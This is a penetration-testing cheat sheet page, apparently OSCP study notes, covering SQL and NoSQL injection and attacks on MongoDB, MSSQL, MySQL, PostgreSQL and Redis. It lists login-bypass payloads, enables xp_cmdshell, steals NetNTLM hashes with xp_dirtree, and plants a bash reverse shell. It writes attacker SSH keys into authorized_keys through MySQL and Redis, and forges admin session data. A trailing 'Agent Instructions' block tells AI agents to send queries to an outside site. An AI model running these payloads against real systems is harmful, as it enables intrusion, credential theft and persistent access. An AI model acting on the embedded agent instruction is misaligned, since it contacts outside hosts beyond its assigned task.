# SQL Injection ## Authentication bypass Here's the classic payload: ``` tom' or 1=1;# ``` If we do encounter errors when our payload is returning multiple rows, we can instruct the query to return a fixed number of records with the LIMIT statement: ``` tom' or 1=1 LIMIT 1;# ``` ## Database analysis Thanks 0xsyr0 for the [cheatsheet](https://github.com/0xsyr0/OSCP#sql-injection). ### **MongoDB** ``` mongo "mongodb://localhost:27017" ``` ``` > use ; > show tables; > show collections; > db.system.keys.find(); > db.users.find(); > db.getUsers(); > db.getUsers({showCredentials: true}); > db.accounts.find(); > db.accounts.find().pretty(); > use admin; ``` #### **User Password Reset to "12345"** ``` > db.getCollection('users').update({username:"admin"}, { $set: {"services" : { "password" : {"bcrypt" : "$2a$10$n9CM8OgInDlwpvjLKLPML.eizXIzLlRtgCh3GRLafOdR9ldAUh/KG" } } } }) ``` ### **MSSQL** #### **Show Database Content** ``` 1> SELECT name FROM master.sys.databases 2> go ``` #### **OPENQUERY** ``` 1> select * from openquery("web\clients", 'select name from master.sys.databases'); 2> go ``` ``` 1> select * from openquery("web\clients", 'select name from clients.sys.objects'); 2> go ``` #### **Binary Extraction as Base64** ``` 1> select cast((select content from openquery([web\clients], 'select * from clients.sys.assembly_files') where assembly_id = 65536) as varbinary(max)) for xml path(''), binary base64; 2> go > export.txt ``` #### **Steal NetNTLM Hash / Relay Attack** ``` SQL> exec master.dbo.xp_dirtree '\\\FOOBAR' ``` #### Impacket mssqlclient.py ``` impacket-mssqlclient :@ ./mssqlclient.py :@ ``` ### **MySQL** ``` mysql -u root -p mysql -u -h -p ``` ``` mysql> show databases; mysql> use ; mysql> show tables; mysql> describe ; mysql> SELECT * FROM Users; mysql> SELECT * FROM users \G; mysql> SELECT Username,Password FROM Users; ``` #### **Update User Password** ``` mysql> update user set password = '37b08599d3f323491a66feabbb5b26af' where user_id = 1; ``` #### **Drop a Shell** ``` mysql> \! /bin/sh ``` #### **xp\_cmdshell** ``` SQL> EXEC sp_configure 'Show Advanced Options', 1; SQL> reconfigure; SQL> sp_configure; SQL> EXEC sp_configure 'xp_cmdshell', 1; SQL> reconfigure SQL> xp_cmdshell "whoami" ``` ``` SQL> enable_xp_cmdshell SQL> xp_cmdshell whoami ``` You can also execute base 64 encoded commands: ```bash SQL> xp_cmdshell "powershell -e " #Get the payload from https://www.revshells.com/ ``` #### **Insert Code to get executed** ``` mysql> insert into users (id, email) values (, "- E $(bash -c 'bash -i >& /dev/tcp// 0>&1')"); ``` #### **Write SSH Key into authorized\_keys2 file** ``` mysql> SELECT "" INTO OUTFILE '/root/.ssh/authorized_keys2' FIELDS TERMINATED BY '' OPTIONALLY ENCLOSED BY '' LINES TERMINATED BY '\n'; ``` #### **Linked SQL Server Enumeration** ``` SQL> SELECT user_name(); SQL> SELECT name,sysadmin FROM syslogins; SQL> SELECT srvname,isremote FROM sysservers; SQL> EXEC ('SELECT current_user') at [\]; SQL> EXEC ('SELECT srvname,isremote FROM sysservers') at [\]; SQL> EXEC ('EXEC (''SELECT suser_name()'') at [\]') at [\]; ``` ### **NoSQL Injection** ``` admin'||''===' {"username": {"$ne": null}, "password": {"$ne": null} } ``` ### **PostgreSQL** ``` $ psql $ psql -h -p 5432 -U -d $ psql -h -p 5432 -U -d ``` #### Common Commands ``` postgres=# \c postgres=# \list postgres=# \c =# \dt =# \du =# TABLE

; =# SELECT * FROM users; =# \q ``` ### **Redis** ``` > AUTH > AUTH > INFO SERVER > INFO keyspace > CONFIG GET * > SELECT > KEYS * > GET PHPREDIS_SESSION:2a9mbvnjgd6i2qeqcubgdv8n4b > SET PHPREDIS_SESSION:2a9mbvnjgd6i2qeqcubgdv8n4b "username|s:8:\"\";role|s:5:\"admin\";auth|s:4:\"True\";" # the value "s:8" has to match the length of the username ``` #### **Enter own SSH Key** ``` redis-cli -h echo "FLUSHALL" | redis-cli -h (echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > /PATH/TO/FILE/.txt cat /PATH/TO/FILE/.txt | redis-cli -h -x set s-key :6379> get s-key :6379> CONFIG GET dir 1) "dir" 2) "/var/lib/redis" :6379> CONFIG SET dir /var/lib/redis/.ssh OK :6379> CONFIG SET dbfilename authorized_keys OK :6379> CONFIG GET dbfilename 1) "dbfilename" 2) "authorized_keys" :6379> save OK ``` ## **SQL Injection** **Master List** ``` admin' or '1'='1 ' or '1'='1 " or "1"="1 " or "1"="1"-- " or "1"="1"/* " or "1"="1"# " or 1=1 " or 1=1 -- " or 1=1 - " or 1=1-- " or 1=1/* " or 1=1# " or 1=1- ") or "1"="1 ") or "1"="1"-- ") or "1"="1"/* ") or "1"="1"# ") or ("1"="1 ") or ("1"="1"-- ") or ("1"="1"/* ") or ("1"="1"# ) or '1`='1- ``` **Authentication Bypass** ``` '-' ' ' '&' '^' '*' ' or 1=1 limit 1 -- -+ '="or' ' or ''-' ' or '' ' ' or ''&' ' or ''^' ' or ''*' '-||0' "-||0" "-" " " "&" "^" "*" '--' "--" '--' / "--" " or ""-" " or "" " " or ""&" " or ""^" " or ""*" or true-- " or true-- ' or true-- ") or true-- ') or true-- ' or 'x'='x ') or ('x')=('x ')) or (('x'))=(('x " or "x"="x ") or ("x")=("x ")) or (("x"))=(("x or 2 like 2 or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' -- - admin' # admin'/* admin' or '2' LIKE '1 admin' or 2 LIKE 2-- admin' or 2 LIKE 2# admin') or 2 LIKE 2# admin') or 2 LIKE 2-- admin') or ('2' LIKE '2 admin') or ('2' LIKE '2'# admin') or ('2' LIKE '2'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'/* 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 admin" -- admin';-- azer admin" # admin"/* admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/* admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/* admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/* admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/* 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 ``` **SQL Truncation Attack** ``` 'admin@' = 'admin@++++++++++++++++++++++++++++++++++++++htb' ``` **sqlite3** ``` sqlite3 .db sqlite> .tables sqlite> select * from users; ``` **sqsh** ``` sqsh -S -U ``` **sqlcmd** ``` sqlcmd -S -U ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://oscp.nstsec.com/web-application-attacks/sql-injection.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.